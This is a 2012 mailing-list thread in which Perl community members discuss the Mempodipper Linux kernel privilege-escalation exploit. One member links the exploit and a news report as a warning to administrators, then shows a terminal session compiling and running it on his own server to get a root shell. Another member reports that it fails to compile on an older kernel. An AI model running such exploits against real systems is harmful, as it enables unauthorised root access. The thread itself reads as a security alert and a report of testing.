[SP-pm] [OFF] Linux Kernel Privilege Escalation >= 2.6.39

Alexei Znamensky russoz at gmail.com
Fri Jan 27 06:12:34 PST 2012


On

Linux alexeiz 2.6.38-13-generic-pae #53-Ubuntu SMP Mon Nov 28 19:41:58 UTC
2011 i686 i686 i386 GNU/Linux

it doesn't even compile.

I use VMware a lot, and support for the VMTools and for the modules that
compile against the Linux kernel is broken for kernel 3.0 (there are some
patches around, but I'm not going to compile a kernel right now), so I'm
using 2.6.38 for the time being.

Regards,
Russian

2012/1/27 Daniel Mantovani <daniel.oliveira.mantovani at gmail.com>

> I just tested it on my VPS,
>
>
> mantovani em mantovanilabs:~$ gcc mempodipper.c
> mantovani em mantovanilabs:~$ ls
> a.out  apps  mempodipper.c  Perl  perl5
> mantovani em mantovanilabs:~$ chmod +x a.out
> mantovani em mantovanilabs:~$ ./a.out
> ===============================
> =          Mempodipper        =
> =           by zx2c4          =
> =         Jan 21, 2012        =
> ===============================
>
> [+] Ptracing su to find next instruction without reading binary.
> [+] Creating ptrace pipe.
> [+] Forking ptrace child.
> [+] Waiting for ptraced child to give output on syscalls.
> [+] Ptrace_traceme'ing process.
> [+] Error message written. Single stepping to find address.
> [+] Resolved call address to 0x4020b8.
> [+] Opening socketpair.
> [+] Waiting for transferred fd in parent.
> [+] Executing child from child fork.
> [+] Opening parent mem /proc/16574/mem in child.
> [+] Sending fd 6 to parent.
> [+] Received fd at 6.
> [+] Assigning fd 6 to stderr.
> [+] Calculating su padding.
> [+] Seeking to offset 0x4020ac.
> [+] Executing su with shellcode.
> # uname -a
> Linux mantovanilabs.com 3.0.4-x86_64-linode21 #1 SMP Thu Sep 1 21:28:01
> EDT 2011 x86_64 GNU/Linux
>
>  --
> Software Engineer
> Just Another Perl Hacker
> Daniel Mantovani +5511 8538-9897
> XOXO
>
> On Jan 27, 2012, at 12:02 PM, Daniel Mantovani wrote:
>
>
> http://www.techworld.com.au/article/413300/linux_vendors_rush_patch_privilege_escalation_flaw_after_root_exploits_emerge
> the exploit, http://www.exploit-db.com/exploits/18411/
>
> Attention administrators, this is a serious matter.
>
>
> --
> Software Engineer
> Just Another Perl Hacker
> Daniel Mantovani +5511 8538-9897
> XOXO
>


-- 
Alexei "RUSSOZ" Znamensky | russoz EM gmail com | http://russoz.org
GPG fingerprint = 42AB E78C B83A AE31 7D27  1CF3 C66F B5C7 71CA 9F3C
http://www.flickr.com/photos/alexeiz | http://github.com/russoz
"I don't know... fly casual!" -- Han Solo